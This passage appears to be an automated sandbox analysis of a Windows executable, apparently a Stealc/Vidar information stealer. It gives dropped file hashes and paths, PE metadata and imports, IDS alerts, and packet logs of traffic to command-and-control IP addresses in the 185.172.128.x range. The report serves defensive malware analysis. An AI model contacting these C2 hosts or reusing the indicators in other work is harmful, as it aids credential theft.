Category:	dropped
Size (bytes):	1329417
Entropy (8bit):	7.898171122766659
Encrypted:	false
SSDEEP:	24576:7vktfYOP8kCc3P/X970uBuBFA3S8Fa+/D9kGmk3Lh9AvPG:7vk5H8LIt1e2Sl+if2YG
MD5:	1E8237D3028AB52821D69099E0954F97
SHA1:	30A6AE353ADDA0C471C6ED5B7A2458B07185ABF2
SHA-256:	9387488F9D338E211BE2CB45109BF590A5070180BC0D4A703F70D3CB3C4E1742
SHA-512:	A6406D7C18694EE014D59DF581F1F76E980B68E3361AE680DC979606A423EBA48D35E37F143154DD97FE5F066BAF0EA51A2E9F8BC822D593E1CBA70EAD6559F3
Malicious:	false
Preview:	...BPM.M.oe....Z.I..Y..t.........RIP\u.fZG..cFQ......h...DAO.P\...j...g.T..id..a...^.PttPbo..ei.i.Z..W.y.g..T_..bMVj.wWAP.v]..xQW..tW.kq..._q.B.nn....p.v.Ds.a.F...vT.Yga.o..A\PM..M.]s...u.lp[.sGmuvB.`YB..g.U....HTB[PU.y..moby..N..q...E.EOs.Q.C[C..^oAOo..sfe....wg.Z....Z...R.kx.DS.WYq.]..dXb.[k.xe.eQc..Z..L..IZ.X.f.x..q..u....Y.[ZH..[v..J.dT.I....RA._OW.x.cK..G]...xwZ....f.Nl`.p.ZS.yJ.J.p..`hn.hYg..u....[Qernk....P[.jJ.....l..RNf......ya.s.M...S.^[TyM..U.fFQ...w..v.KFw.X.....oS[h...NRj..UYt.....nM..d..G.R]j.x...Y.C..b....U.as`GOT.......T.d.GVQV...[.Ct[.`w.R..Vc..O.D.`.dH.jm..S[...Q.....LmoTY.D_.IM...uCtDVt.oW..LK.E..........Ek.fxT.e.f.p.a.O....gaQ.g.O..K.N..l.].......f.Z.[o...HVTJB.l.d.GYVD.U.o....^.F..uH.LH.n.f....Hx^kON..kT.Tld.T.KV.[...MM\NL...Z...R....pd......j..m.DhIFCSO..eMf.W..c.C.[..h.....y.^A..S.W...i.n....N.E.w_....QSGKKF.k.d.g..O...r...o..EKUV.....J...r...I..HU...]xFd.aq..GTC.s.a.p..J....r^GYK.P.C.....qH.....a[..V...FJIsJ._.WTIvtKE.k.me[...H..wTw.a....c...n[_.l...f.I....axf`O

C:\Users\user\AppData\Roaming\SecureClient\relay.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1596416
Entropy (8bit):	6.46619614175955
Encrypted:	false
SSDEEP:	49152:n2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTcq+PDXx1lWz0v2:DmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
MD5:	10D51BECD0BBCE0FAB147FF9658C565E
SHA1:	4689A18112FF876D3C066BC8C14A08FD6B7B7A4A
SHA-256:	7B2DB9C88F60ED6DD24B1DEC321A304564780FDB191A96EC35C051856128F1ED
SHA-512:	29FAF493BB28F7842C905ADC5312F31741EFFB09F841059B53D73B22AEA2C4D41D73DB10BBF37703D6AEB936FFACBC756A3CC85BA3C0B6A6863EF4D27FEFCD29
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S1,..PB..PB..PB.x&.<PB.x&.PB.x&.cQB..(...PB..(.>PB..PC..SB.x&..PB.x&..PB.x&..PB.x&..PB.Rich.PB.........PE..L.....kU...........%.....\...........0.......p......................................1.....@.................................dP..\|....p..........................z....}..................................@............p..,............................text...6Z.......\.................. ..`.rdata..J....p.......`..............@..@.data...\........Z...t..............@....rsrc........p......................@..@.reloc..6...........................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SecureClient\whale.dbf

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe
File Type:	data
Category:	dropped
Size (bytes):	87278
Entropy (8bit):	4.38402884518968
Encrypted:	false
SSDEEP:	1536:X5B5jj6bWG+5cAD2Fno6ktTgDa+0rldAe7VwDb4bWTfmdI7p:X5Ljj6bi512Fn3b0Ie7qgbWd9
MD5:	A723BF46048E0BFB15B8D77D7A648C3E
SHA1:	8952D3C34E9341E4425571E10F22B782695BB915
SHA-256:	B440170853BDB43B66497F701AEE2901080326975140B095A1669CB9DEE13422
SHA-512:	CA8EA2F7F3C7AF21B5673A0A3F2611B6580A7ED02EFA2CFD8B343EB644FF09682BDE43B25EF7AAB68530D5CE31DCBD252C382DD336ECB610D4C4EBDE78347273
Malicious:	false
Preview:	......P..E.o...]k.`...Y.....q.rsD.o.QPk.]fpZl\.R....DG..vyH^Q.....tpW........kgE.p.`O...............X..S.....x.....`.R.fZ.N...M..h...yC..H.O.XMQiV..sq..Ai.lV...Pv..WO].be.sU.nU..rGe.P....BE.MSnb.Lq....o.p..a.s..a..fEa..R..U.sNC.qZwI...XJ.M..H.h.........d.TSZR.UqXFj....Z.U..XTN.......B.CK...S._.^pjLRnbG^.u.D...mx..e......IYlK.l.....p._p.S.l...BZu..q.UG\.U....y.Xdi..Ff...rmqJ..V.AM.os.Oy..FV.._bNiEyiPIL.AW..GD.....che..iGU.oSi.Y..Yt.\].i.x.N.KN.`FKscyQ.M.....pqhieCU.c.ru..Melr.YRAM.Tg.......]..r.b.pP...._..gUo.`QvN.]il..G...q...NP.m.qHi.iiJ_^.[.Y...e.oHy.p.]..a...X.o....A.cL.C.A.._cQp..oD.L.L.O_.ewev.peB.ia..Ay.t.Y\W.]..l.F._i.....^.gDZTDNUj..dDM..o...........m..E........N.X..x...v..Cg....VuJ.k...Ec..JW`^yZ.u.B.im....T...C\.x..Z.G]B....u.r..gn.V...Q...mnN.quc.rM\..S...AjY.oVTa.p.Oebr.g........eC[A....cvqB..Ed..q.kR..BiYg`bQcA.E.XKs.\o.C..qyjUm.o..C..sc.F.xlnVI.q..q.Vs...p.Bg..O.dha..t..O.`x....c.n.....xr...f.ggn.LR[S..Aqk.j..u....nb.`Gd^...b.fYKZ^R..l...c..EbGm.pq..s..qwjn.`P...b..JE...t

Chrome Cache Entry: 111

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (787)
Category:	downloaded
Size (bytes):	792
Entropy (8bit):	5.171152867158667
Encrypted:	false
SSDEEP:	24:bZczaXqUqBHslgT9lCuABuoB7HHHHHHHYqmffffffo:bqaXqTKlgZ01BuSEqmffffffo
MD5:	D442BE506DE6268D04FC1F7BB6BF0D9C
SHA1:	0468FD242E05A18FED06421F3F5C25968E73BEB4
SHA-256:	82A211D13A04514E4EC121FA2818C8B8D5F9020610351CA6FEBF1518F7B5C65B
SHA-512:	160E675949163A6BDB93EF2C3359B544A0547210D86ADC2A0F7971D14AB9D4AF876DBBF4EFC7D08BBA871FE21FD67840BA951D4A0FDF077FDB12DBDA94EC33B2
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["nfl draft byron murphy","fcc internet","lego milky way galaxy","kansas city tornadoes","wordle today answer april 26","shamrock golden retriever puppy","what draft picks do eagles have in 2024","latin american music awards winners"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.328176831472749
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	TNQTc6Qmkg.exe
File size:	441'857 bytes
MD5:	fcac04fb67b3dec2db923867c5cb0701
SHA1:	56af848d85c781fd6ac0b8e11b2aec770fc4a105
SHA256:	df620b823687fa8371cb9e5a0dc17c483d804ef601757968b8666de2608d8ebb
SHA512:	66dd7676f43c1578e9d1f2e7e6bca50ae84541497d7b5801872fe7bad8118bc92d06ba4fd0f7a0f0b47e3d47485f116e89bf43e3324c1ef767d2d62befa236cd
SSDEEP:	12288:FiJmkAC1wKXfuGRen+MkNDbfs+uR6/N40KZ:Hk2quGRO+MkNDg+uR6/u0W
TLSH:	5B949E2372E0BC60E526473E9F1EA6E8372DF9208F65EB67224C5D1F15712B0D263792
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ku.[Ku.[Ku.[F'e[Uu.[F'Z[.u.[F'[[du.[B.)[Hu.[Ku.[;u.[.._[Ju.[F'a[Ju.[..d[Ju.[RichKu.[................PE..L...\|P.d...........

File Icon


Icon Hash:	531151454545610d

Static PE Info

General

Entrypoint:	0x404102
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x6402507C [Fri Mar 3 19:54:36 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	7b429a3347fd898e799116b6973c5111

Entrypoint Preview

Instruction
call 00007F0354740F22h
jmp 00007F035473AB25h
push 00000014h
push 00418FA0h
call 00007F035473CABDh
call 00007F035473F678h
movzx esi, ax
push 00000002h
call 00007F0354740EB5h
pop ecx
mov eax, 00005A4Dh
cmp word ptr [00400000h], ax
je 00007F035473AB26h
xor ebx, ebx
jmp 00007F035473AB55h
mov eax, dword ptr [0040003Ch]
cmp dword ptr [eax+00400000h], 00004550h
jne 00007F035473AB0Dh
mov ecx, 0000010Bh
cmp word ptr [eax+00400018h], cx
jne 00007F035473AAFFh
xor ebx, ebx
cmp dword ptr [eax+00400074h], 0Eh
jbe 00007F035473AB2Bh
cmp dword ptr [eax+004000E8h], ebx
setne bl
mov dword ptr [ebp-1Ch], ebx
call 00007F035473EFFEh
test eax, eax
jne 00007F035473AB2Ah
push 0000001Ch
call 00007F035473AC01h
pop ecx
call 00007F0354740AB3h
test eax, eax
jne 00007F035473AB2Ah
push 00000010h
call 00007F035473ABF0h
pop ecx
call 00007F035473F540h
and dword ptr [ebp-04h], 00000000h
call 00007F035473DFF7h
test eax, eax
jns 00007F035473AB2Ah
push 0000001Bh
call 00007F035473ABD6h
pop ecx
call dword ptr [004130C0h]
mov dword ptr [04042910h], eax
call 00007F0354740F09h
mov dword ptr [00454EC0h], eax
call 00007F0354740B06h
test eax, eax
jns 00007F035473AB2Ah

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[IMP] VS2008 SP1 build 30729
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x193f4	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3c43000	0x16b25	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3c5a000	0x1454	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x13200	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x188c8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x13000	0x18c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x11893	0x11a00	ca5bc49b8187fa646d9a75c8de94b281	False	0.609624335106383	data	6.6863316881946195	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x13000	0x6cce	0x6e00	3df6ea9d6335d8a1353d73e4da74d796	False	0.3877840909090909	data	4.724002293602075	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1a000	0x3c28928	0x3b000	cbd1ceeaf9142ab773455b99fb8144ae	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3c43000	0x16b25	0x16c00	154f3e607e787fb91651b559b729e8a3	False	0.42682220123626374	data	4.971687043528804	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x3c5a000	0x1454	0x1600	aeb538b00bbd53425e4c7205bbd4074e	False	0.7235440340909091	data	6.347740184989028	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x3c436b8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	0.4066820276497696
RT_ICON	0x3c43d80	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.16400414937759336
RT_ICON	0x3c46328	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.21365248226950354
RT_ICON	0x3c46790	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.3694029850746269
RT_ICON	0x3c47638	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.4562274368231047
RT_ICON	0x3c47ee0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	0.46255760368663595
RT_ICON	0x3c485a8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.4486994219653179
RT_ICON	0x3c48b10	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.2671161825726141
RT_ICON	0x3c4b0b8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.30909943714821764
RT_ICON	0x3c4c160	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.35904255319148937
RT_ICON	0x3c4c5c8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.5666311300639659
RT_ICON	0x3c4d470	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.5532490974729242
RT_ICON	0x3c4dd18	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.6170520231213873
RT_ICON	0x3c4e280	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.4627593360995851
RT_ICON	0x3c50828	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.4899155722326454
RT_ICON	0x3c518d0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	0.4934426229508197
RT_ICON	0x3c52258	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.44858156028368795
RT_ICON	0x3c526c0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.4229744136460554
RT_ICON	0x3c53568	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.4833032490974729
RT_ICON	0x3c53e10	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	0.5858294930875576
RT_ICON	0x3c544d8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.5079479768786127
RT_ICON	0x3c54a40	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.47271784232365144
RT_ICON	0x3c56fe8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.48545966228893056
RT_ICON	0x3c58090	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	0.49508196721311476
RT_ICON	0x3c58a18	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.5452127659574468
RT_STRING	0x3c58e80	0x332	data	0.47555012224938875
RT_STRING	0x3c591b4	0x354	data	0.46830985915492956
RT_GROUP_ICON	0x3c59508	0x68	data	0.7115384615384616
RT_GROUP_ICON	0x3c59570	0x68	data	0.6826923076923077
RT_GROUP_ICON	0x3c595d8	0x30	data	0.9375
RT_GROUP_ICON	0x3c59608	0x76	data	0.6779661016949152
RT_VERSION	0x3c59680	0x244	data	0.5396551724137931
RT_MANIFEST	0x3c598c4	0x261	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (549), with CRLF line terminators	0.5451559934318555

Imports

DLL

Import

KERNEL32.dll

GetSystemDefaultLangID, GlobalMemoryStatus, FindResourceA, GetLocaleInfoA, LoadLibraryExW, InterlockedDecrement, GetComputerNameW, GetSystemDefaultLCID, BackupSeek, GetConsoleAliasesA, GetWindowsDirectoryA, EnumTimeFormatsW, SetCommState, GlobalAlloc, GetVolumeInformationA, LoadLibraryW, LocalShrink, TerminateThread, ReadConsoleInputA, WriteConsoleW, GetModuleFileNameW, GetACP, MultiByteToWideChar, GetLastError, ChangeTimerQueueTimer, SetLastError, GetThreadLocale, GetProcAddress, RemoveDirectoryA, SetFileAttributesA, LoadLibraryA, SetCalendarInfoW, CreateHardLinkW, CreateEventW, QueryDosDeviceW, AddAtomA, GlobalFindAtomW, BuildCommDCBA, VirtualProtect, GetConsoleProcessList, GetTempPathA, EncodePointer, DecodePointer, HeapReAlloc, ExitProcess, GetModuleHandleExW, AreFileApisANSI, WideCharToMultiByte, GetCommandLineA, RaiseException, RtlUnwind, IsProcessorFeaturePresent, IsDebuggerPresent, HeapFree, HeapAlloc, EnterCriticalSection, LeaveCriticalSection, FlushFileBuffers, WriteFile, GetConsoleCP, GetConsoleMode, DeleteCriticalSection, HeapSize, GetStdHandle, GetFileType, GetStartupInfoW, GetProcessHeap, CloseHandle, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCurrentThreadId, GetModuleFileNameA, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, SetFilePointerEx, LCMapStringW, OutputDebugStringW, GetStringTypeW, CreateFileW, SetEndOfFile, ReadFile, ReadConsoleW

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/27/24-02:18:57.298293	TCP	2856233	ETPRO TROJAN Win32/Unknown Loader Related Activity (GET)	49730	80	192.168.2.4	185.172.128.90
04/27/24-02:19:03.852745	TCP	2051831	ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	80	49733	185.172.128.76	192.168.2.4
04/27/24-02:19:02.778873	TCP	2044243	ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in	49733	80	192.168.2.4	185.172.128.76
04/27/24-02:19:03.279794	TCP	2044244	ET TROJAN Win32/Stealc Requesting browsers Config from C2	49733	80	192.168.2.4	185.172.128.76
04/27/24-02:19:03.561564	TCP	2051828	ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1	80	49733	185.172.128.76	192.168.2.4
04/27/24-02:19:03.564460	TCP	2044246	ET TROJAN Win32/Stealc Requesting plugins Config from C2	49733	80	192.168.2.4	185.172.128.76

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 27, 2024 02:18:52.902697086 CEST	49675	443	192.168.2.4	173.222.162.32
Apr 27, 2024 02:18:57.122874975 CEST	49730	80	192.168.2.4	185.172.128.90
Apr 27, 2024 02:18:57.295671940 CEST	80	49730	185.172.128.90	192.168.2.4
Apr 27, 2024 02:18:57.295909882 CEST	49730	80	192.168.2.4	185.172.128.90
Apr 27, 2024 02:18:57.298293114 CEST	49730	80	192.168.2.4	185.172.128.90
Apr 27, 2024 02:18:57.470125914 CEST	80	49730	185.172.128.90	192.168.2.4
Apr 27, 2024 02:18:58.759468079 CEST	80	49730	185.172.128.90	192.168.2.4
Apr 27, 2024 02:18:58.809022903 CEST	49730	80	192.168.2.4	185.172.128.90
Apr 27, 2024 02:18:58.962276936 CEST	49730	80	192.168.2.4	185.172.128.90
Apr 27, 2024 02:18:59.798409939 CEST	49731	80	192.168.2.4	185.172.128.228
Apr 27, 2024 02:18:59.969618082 CEST	80	49731	185.172.128.228	192.168.2.4
Apr 27, 2024 02:18:59.969858885 CEST	49731	80	192.168.2.4	185.172.128.228
Apr 27, 2024 02:18:59.969858885 CEST	49731	80	192.168.2.4	185.172.128.228
Apr 27, 2024 02:19:00.142405987 CEST	80	49731	185.172.128.228	192.168.2.4
Apr 27, 2024 02:19:00.143084049 CEST	80	49731	185.172.128.228	192.168.2.4
Apr 27, 2024 02:19:00.144254923 CEST	49731	80	192.168.2.4	185.172.128.228
Apr 27, 2024 02:19:00.154562950 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.325936079 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.326019049 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.326092958 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.497167110 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.497540951 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.497560978 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.497634888 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.497652054 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.497745037 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.497786999 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.497833014 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.497939110 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.497978926 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.498017073 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.498099089 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.498138905 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.498167992 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.498302937 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.498342037 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.669612885 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.669636011 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.669652939 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.669671059 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.669689894 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.669708014 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.669724941 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.669725895 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.669743061 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.669765949 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.669779062 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.669807911 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.669857979 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.669876099 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.669893980 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.669909000 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.669935942 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.669991970 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.670064926 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.670111895 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.670116901 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.670135021 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.670152903 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.670171022 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.670177937 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.670188904 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.670206070 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.670217037 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.670249939 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.841933012 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.842051029 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.842084885 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.842108011 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.842211962 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.842257023 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.842291117 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.842346907 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.842485905 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.842533112 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.842581034 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.842633009 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.842875957 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.842927933 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.842931032 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.842962027 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.842972994 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.843007088 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.843128920 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.843173981 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.843197107 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.843245983 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.843272924 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.843322039 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.843389034 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.843408108 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.843432903 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.843456030 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.843497992 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.843539953 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.843542099 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.843585968 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.843748093 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.843792915 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.843884945 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.843930960 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.845048904 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.845098972 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.845232964 CEST	80	49732	185.172.128.59	192.168.2.4
